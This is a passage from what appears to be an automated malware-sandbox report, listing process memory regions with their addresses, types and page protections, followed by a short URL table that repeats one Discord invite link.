page read and write
|
||
27B49F08000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
14BD81BD000
|
heap
|
page read and write
|
||
19C3BE44000
|
trusted library allocation
|
page read and write
|
||
24291630000
|
heap
|
page read and write
|
||
242929D8000
|
trusted library allocation
|
page read and write
|
||
7FF84922C000
|
trusted library allocation
|
page read and write
|
||
27B466E6000
|
heap
|
page read and write
|
||
29CC000
|
stack
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
2849DCD1000
|
trusted library allocation
|
page read and write
|
||
16573C57000
|
heap
|
page read and write
|
||
23BC17F000
|
stack
|
page read and write
|
||
19C4AE68000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
23BBEFE000
|
stack
|
page read and write
|
||
F796BB7000
|
stack
|
page read and write
|
||
1657417F000
|
heap
|
page read and write
|
||
27B58354000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
2429164B000
|
heap
|
page read and write
|
||
7FF848FC8000
|
trusted library allocation
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
330384E000
|
stack
|
page read and write
|
||
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
27B491A1000
|
trusted library allocation
|
page read and write
|
||
17AD3C9000
|
stack
|
page read and write
|
||
27B493E8000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
17AC5F9000
|
stack
|
page read and write
|
||
27B58111000
|
trusted library allocation
|
page read and write
|
||
242A9BA4000
|
heap
|
page read and write
|
||
27B60910000
|
heap
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
16574090000
|
heap
|
page read and write
|
||
287BC9BA000
|
heap
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page execute and read and write
|
||
19C38F28000
|
heap
|
page read and write
|
||
27B467F0000
|
heap
|
page readonly
|
||
17ABF0F000
|
stack
|
page read and write
|
||
16501E2B000
|
trusted library allocation
|
page read and write
|
||
8BEB08C000
|
stack
|
page read and write
|
||
17AC4F8000
|
stack
|
page read and write
|
||
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849247000
|
trusted library allocation
|
page read and write
|
||
2428FBF0000
|
heap
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
287CE4C1000
|
trusted library allocation
|
page read and write
|
||
16574022000
|
heap
|
page read and write
|
||
8BEA43E000
|
stack
|
page read and write
|
||
2849C98E000
|
trusted library allocation
|
page read and write
|
||
14BD8180000
|
heap
|
page read and write
|
||
16571C66000
|
heap
|
page read and write
|
||
165012A8000
|
trusted library allocation
|
page read and write
|
||
7FF849278000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
287CE72D000
|
trusted library allocation
|
page read and write
|
||
8BEA33E000
|
stack
|
page read and write
|
||
19C52F30000
|
heap
|
page execute and read and write
|
||
287BFDF5000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
16574097000
|
heap
|
page read and write
|
||
7FF848FD8000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
19C4AD73000
|
trusted library allocation
|
page read and write
|
||
407000
|
unkown
|
page readonly
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
17AD44D000
|
stack
|
page read and write
|
||
14BF2158000
|
heap
|
page read and write
|
||
24291880000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
2428FD19000
|
heap
|
page read and write
|
||
33037CD000
|
stack
|
page read and write
|
||
A6829CA000
|
stack
|
page read and write
|
||
7FF849236000
|
trusted library allocation
|
page read and write
|
||
14BF2270000
|
heap
|
page execute and read and write
|
||
7BF000
|
stack
|
page read and write
|
||
27B49050000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
16573FB0000
|
heap
|
page read and write
|
||
20A0000
|
heap
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
14BD81BA000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
14BDADCB000
|
trusted library allocation
|
page read and write
|
||
19C3A9B0000
|
trusted library allocation
|
page read and write
|
||
48E000
|
heap
|
page read and write
|
||
287BF099000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
2849D513000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
24292B06000
|
trusted library allocation
|
page read and write
|
||
287BCBD0000
|
heap
|
page read and write
|
||
19C4AF55000
|
trusted library allocation
|
page read and write
|
||
24293627000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7DF4DCB70000
|
trusted library allocation
|
page execute and read and write
|
||
2849E205000
|
trusted library allocation
|
page read and write
|
||
287D6947000
|
heap
|
page execute and read and write
|
||
14BF2575000
|
heap
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page execute and read and write
|
||
8BE9AC3000
|
stack
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
16573D17000
|
heap
|
page execute and read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
242A9F3D000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
7FF849123000
|
trusted library allocation
|
page read and write
|
||
19C4AD5B000
|
trusted library allocation
|
page read and write
|
||
27B60870000
|
heap
|
page read and write
|
||
287CE791000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
287D6DAA000
|
heap
|
page read and write
|
||
1DB14C70000
|
unkown
|
page readonly
|
||
2428FC90000
|
heap
|
page read and write
|
||
16571D1C000
|
heap
|
page read and write
|
||
7FF848EAF000
|
trusted library allocation
|
page execute and read and write
|
||
2849D683000
|
trusted library allocation
|
page read and write
|
||
16571C3E000
|
heap
|
page read and write
|
||
19C3B75C000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
7FF8491DA000
|
trusted library allocation
|
page read and write
|
||
27B583E7000
|
trusted library allocation
|
page read and write
|
||
7FF849158000
|
trusted library allocation
|
page read and write
|
||
A6828CF000
|
stack
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
14BD8350000
|
heap
|
page read and write
|
||
14BDA871000
|
trusted library allocation
|
page read and write
|
||
F797A07000
|
stack
|
page read and write
|
||
19C3BAE6000
|
trusted library allocation
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
19C4AE28000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
7FF849256000
|
trusted library allocation
|
page read and write
|
||
2849AAF0000
|
heap
|
page read and write
|
||
33029F9000
|
stack
|
page read and write
|
||
19C530DC000
|
heap
|
page read and write
|
||
19C3BAD9000
|
trusted library allocation
|
page read and write
|
||
16500C06000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
16573D0E000
|
heap
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
242AA0B0000
|
heap
|
page read and write
|
||
A681D7E000
|
stack
|
page read and write
|
||
165740BB000
|
heap
|
page read and write
|
||
7DF442680000
|
trusted library allocation
|
page execute and read and write
|
||
1657411C000
|
heap
|
page read and write
|
||
2849D362000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
287BC900000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
19C3AA40000
|
heap
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
27B60624000
|
heap
|
page read and write
|
||
8BEA4BB000
|
stack
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
24292804000
|
trusted library allocation
|
page read and write
|
||
2849C84A000
|
heap
|
page read and write
|
||
19C3BF33000
|
trusted library allocation
|
page read and write
|
||
287BF4A6000
|
trusted library allocation
|
page read and write
|
||
A681C79000
|
stack
|
page read and write
|
||
7FF848FF8000
|
trusted library allocation
|
page read and write
|
||
1657418F000
|
heap
|
page read and write
|
||
16573C6D000
|
heap
|
page read and write
|
||
7FF848F9A000
|
trusted library allocation
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page execute and read and write
|
||
14BDABE5000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
14BF2630000
|
trusted library allocation
|
page read and write
|
||
3302977000
|
stack
|
page read and write
|
||
7FF848F15000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
27B466AA000
|
heap
|
page read and write
|
||
33025FE000
|
stack
|
page read and write
|
||
16573770000
|
heap
|
page execute and read and write
|
||
19C3BBA8000
|
trusted library allocation
|
page read and write
|
||
F7964F3000
|
stack
|
page read and write
|
||
287D6CCB000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
24292A11000
|
trusted library allocation
|
page read and write
|
||
6CEA37F000
|
stack
|
page read and write
|
||
7FF849149000
|
trusted library allocation
|
page read and write
|
||
330364E000
|
stack
|
page read and write
|
||
17AC3F7000
|
stack
|
page read and write
|
||
23BBBFA000
|
stack
|
page read and write
|
||
27B605A7000
|
heap
|
page execute and read and write
|
||
24292F88000
|
trusted library allocation
|
page read and write
|
||
242A9F0F000
|
heap
|
page read and write
|
||
14BD9C65000
|
heap
|
page read and write
|
||
287D6C7A000
|
heap
|
page read and write
|
||
F796B3E000
|
stack
|
page read and write
|
||
19C3BEAA000
|
trusted library allocation
|
page read and write
|
||
27B4986A000
|
trusted library allocation
|
page read and write
|
||
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
7FF84927F000
|
trusted library allocation
|
page read and write
|
||
7FF849143000
|
trusted library allocation
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
F79657F000
|
stack
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
27B600EB000
|
heap
|
page read and write
|
||
19C531B0000
|
heap
|
page execute and read and write
|
||
16571DC5000
|
heap
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
287BC9B4000
|
heap
|
page read and write
|
||
CA0000
|
unkown
|
page readonly
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
19C5343F000
|
heap
|
page read and write
|
||
7FF848FC4000
|
trusted library allocation
|
page read and write
|
||
2428FC50000
|
heap
|
page read and write
|
||
23BBC7E000
|
stack
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
27B49EE8000
|
trusted library allocation
|
page read and write
|
||
17AC2F9000
|
stack
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
287BE96D000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
27B46620000
|
heap
|
page read and write
|
||
23BB793000
|
stack
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
165740C3000
|
heap
|
page read and write
|
||
6CEB4CE000
|
stack
|
page read and write
|
||
242A9EE7000
|
heap
|
page read and write
|
||
7FF848DFB000
|
trusted library allocation
|
page read and write
|
||
2849D875000
|
trusted library allocation
|
page read and write
|
||
2849C755000
|
heap
|
page read and write
|
||
19C53437000
|
heap
|
page read and write
|
||
14BDABE1000
|
trusted library allocation
|
page read and write
|
||
287CE7AF000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
16500A52000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
27B48090000
|
heap
|
page execute and read and write
|
||
17ABE83000
|
stack
|
page read and write
|
||
23BCD4C000
|
stack
|
page read and write
|
||
19C4ABA4000
|
trusted library allocation
|
page read and write
|
||
407000
|
unkown
|
page readonly
|
||
14BD8267000
|
heap
|
page read and write
|
||
242A9F47000
|
heap
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
7FF848E9C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
16501788000
|
trusted library allocation
|
page read and write
|
||
17AC6FE000
|
stack
|
page read and write
|
||
8BEA0F9000
|
stack
|
page read and write
|
||
165004CD000
|
trusted library allocation
|
page read and write
|
||
7FF849008000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
2429282F000
|
trusted library allocation
|
page read and write
|
||
242A9B59000
|
heap
|
page read and write
|
||
2428FCD2000
|
heap
|
page read and write
|
||
287BF43F000
|
trusted library allocation
|
page read and write
|
||
2849E715000
|
trusted library allocation
|
page read and write
|
||
2849AC68000
|
heap
|
page read and write
|
||
287CE4A1000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E24000
|
trusted library allocation
|
page read and write
|
There are 1338 hidden memdumps, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://discord.com/invite/BNXa5rYFXM
|
||
https://discord.com/invite/BNXa5rYFXM
|
||
https://discord.com/invite/BNXa5rYFXM
|
||
https://discord.com/invite/BNXa5rYFXM
|